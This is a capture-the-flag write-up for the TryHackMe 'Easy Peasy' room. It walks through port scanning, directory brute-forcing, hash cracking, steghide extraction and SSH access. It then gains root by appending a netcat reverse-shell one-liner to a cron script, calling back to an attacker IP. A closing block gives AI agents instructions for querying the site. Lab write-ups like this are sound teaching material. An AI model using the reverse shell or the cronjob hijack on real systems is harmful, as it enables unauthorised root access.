# Easy Peasy

![](/files/-Mc0So3sFHDvYzE6o8sv)

## Reconnaissance

Initial nmap scan to find all open ports

```
nmap -p- -T5 10.10.53.168
```

![](/files/-Mc0Vce88L1uCBbstAtY)

There are three ports open

![](/files/-Mc0VtlciQrUiu1p3tRC)

Detailed Nmap Scan :&#x20;

Command Breakdown:&#x20;

* (**-sV):** Service version
* (**-sC**): Default nmap scripts
* (**-p):** Specifying ports 80,6498,65524
* (**-oN nmap**): Saving it into a file called nmap

```
nmap -sV -sC -p 80,6498,65524 -oN nmap 10.10.53.168
```

![](/files/-Mc0VniToMMzLPupJHPZ)

The version of `nginx is 1.16.1`

![](/files/-Mc0W0X-2_3HbPkcqu-g)

Apache is running on the highest port

![](/files/-Mc0WCus0VHTQLErg99d)

## Enumeration

### Port 80: HTTP

Lets visit the site.

![](/files/-Mc0WSbeHnPR6lIk1Rjp)

There is nothing interesting in the links provided and in the source code, lets run `gobuster` to find hidden files and directories.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.53.168/
```

![](/files/-Mc0_T3559PexdYBvioy)

Looks like we found a directory, lets run another gobuster scan on this directory while we explore this one.

![](/files/-Mc0aJUtiMW4fSEG1eAI)

We found another directory, lets visit both these pages.

![](/files/-Mc0b16tfZUeOGKaLu7Q)

There seems to be nothing, lets go to the whatever directory

![](/files/-Mc0bWbaufe4QjD6ID0c)

There is nothing on the page, lets look at the source code

![](/files/-Mc0bbJdFbytJU2KTtqA)

We have a hash, lets decrypt it.

![](/files/-Mc0bupx9jVpT1UmWQPB)

We have the first flag

![](/files/-Mc0c0saglOtYfmozSmV)

### Port 65524: HTTP

Lets visit the site

![](/files/-Mc0XQJIv29IRgEWTDBo)

Its a Apache 2 default page, scrolling down a bit, we find flag 3.

![](/files/-Mc0a-Xsw6kpICY-EZ4p)

![](/files/-Mc0aFB9fCRhaeqWKFBO)

Lets run gobuster to find hidden directories and files.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.53.168:65524/
```

While gobuster is running lets check the `robots.txt` page, we find some interesting information there.

![](/files/-Mc0Ya9Nmg8oF3rtODiW)

This looks like a hash, lets try to crack it. Lets first try to identify what type of hash it is

![](/files/-Mc0afKh2hnSZxY7rDAi)

Its a MD5 hash, now lets crack it.

![](/files/-Mc0amGHgUFI2jrNN_yU)

And we have the second flag.

![](/files/-Mc0arCjEhmJKEEU4ZkG)

Looking back at the default page, we have something else in the source code

![](/files/-Mc0cysGg96X7ZJsMl33)

Another hash. Lets crack it

![](/files/-Mc0dFJ5MAl_ILR1JBtu)

Its another directory, lets visit it.

![](/files/-Mc0dP0pINuVK6KsF9Ys)

Its a page with binary code image, lets look at the source code.

![](/files/-Mc0dkuCPnTVV6915Yff)

We have a string, lets try to identify the hash.

![](/files/-Mc0e3p3sgaB9rZ22LC5)

Lets crack it.

![](/files/-Mc0eeFx-6wRfq96s7ZO)

Looks like it is a password

Now lets download the binary picture and see if there is anything hidden in it using `steghide`.

```
steghide --extract -sf binarycodepixabay.jpg
```

It is asking for a password, so I used the one we just found.

![](/files/-Mc0eqwfqXEI7a-ocPYc)

We found a text file, lets read it.

![](/files/-Mc0ewJCSTf4A_GU6zk-)

We have a username and a password in binary, lets decode it.

![](/files/-Mc0f5re_tIXRJu74xz6)

We found the password, lets login through ssh. The ssh server is running on port `6498` based on our nmap scan.

```
ssh -p 6498 boring@10.10.53.168
```

![](/files/-Mc0fZ3EIpf_GpdvJCfR)

We are logged in.

We can read the user.txt file, but it seems to be encrypted, so I will leave cracking it to you. (Hint: CyberChef and ROT 13)

![](/files/-Mc0ftJgzYZjyt_bC-Ef)

We can also answer all the other questions

![](/files/-Mc0gCt8wWPk_GuT9A0r)

## Privilege Escalation

As the room had cronjob as one of its tags, I looked for `.sh` file in the system that belonged to the user boring.

```
find / -type f -user boring -name *.sh 2>/dev/null
```

![](/files/-Mc0h9-8tC0Wk9tvZpQA)

Looks like we have a file, lets look at it.

![](/files/-Mc0hGHMsk4AuIqkXXuA)

It says it will run as root, so why don't we echo a reverse shell into the file to get a shell as root.

```
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f" >> .mysecretcronjob.sh
```

Make sure to change the IP in the command and start a netcat listener

![](/files/-Mc0hbnCw6aoGbnjb6ku)

Once you echo the command into the file, the contents of the file should look like this.

![](/files/-Mc0imnhRimz9gZngqK0)

After a while you should get a shell as root

![](/files/-Mc0iBpPvHcu4a4mgNQl)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://writeups.adityadindi.com/tryhackme/untitled/easy-peasy.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.